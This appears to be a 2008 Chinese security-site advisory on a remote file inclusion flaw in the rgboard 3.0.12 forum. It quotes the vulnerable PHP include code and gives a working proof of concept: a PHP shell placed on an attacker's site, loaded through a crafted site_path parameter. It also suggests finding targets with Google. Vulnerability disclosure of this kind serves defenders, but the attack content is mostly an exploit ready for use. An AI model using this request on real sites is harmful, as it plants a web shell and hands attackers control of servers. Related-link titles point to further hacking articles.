快捷導(dǎo)航

rgboard 3.0.12 遠(yuǎn)程文件包含漏洞

更新時間：2008年05月07日 19:28:01 作者：

Infos: rgboard 3.0.12 遠(yuǎn)程文件包含漏洞 Author: Flyh4t[w.s.t] rgboard 3.0.12 是韓國的一個論壇程序,可以用google搜索rgboard查看使用的網(wǎng)站

vul code:
\include\bbs.lib.inc.php：
if (!defined('BBS_LIB_INC_INCLUDED')) {
define('BBS_LIB_INC_INCLUDED', 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path='./';
require_once “{$site_path}include/lib.inc.php”;
//$site_path沒有過濾直接放過來包含了
poc:
在你的網(wǎng)站放個phpshell,目錄和文件名為/include/lib.inc.php
然后訪問
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/

您可能感興趣的文章:

相關(guān)文章

文件上傳漏洞在惠信中的應(yīng)用
文件上傳漏洞在惠信中的應(yīng)用...
2007-01-01
WDB論壇存在多個嚴(yán)重漏洞
WDB論壇存在多個嚴(yán)重漏洞...
2007-01-01
黑客如何利用Ms05002溢出找“肉雞” (圖)
黑客如何利用Ms05002溢出找“肉雞” (圖)...
2007-01-01
注入過程中遇到DB_OWNER的想法(圖)
注入過程中遇到DB_OWNER的想法(圖)...
2007-01-01
Debian災(zāi)難性漏洞
Debian OpenSSL包里的算法有問題，random number生成居然是在process pid里選取，導(dǎo)致生成key可窮舉
2008-05-05
一個意想不到的注入點發(fā)現(xiàn)過程
一個意想不到的注入點發(fā)現(xiàn)過程...
2007-01-01
AngelShell：讓所有正向程序?qū)崿F(xiàn)反向連接（應(yīng)用篇）
AngelShell：讓所有正向程序?qū)崿F(xiàn)反向連接（應(yīng)用篇）...
2007-01-01
黑客之門的魅力：感染與加載(圖)
黑客之門的魅力：感染與加載(圖)...
2007-01-01
窮追猛打:破譯Foxmail“密碼天書”
窮追猛打:破譯Foxmail“密碼天書”...
2007-01-01
Flash 0day生成器提供下載
昨天發(fā)了open寫的Flash 0day生成器，當(dāng)時忘了說了，是在賞月那里看到的。結(jié)果今天open跟我說發(fā)出來之后，好多人找他問修改方法，所以就有了現(xiàn)在這篇文章。
2008-05-05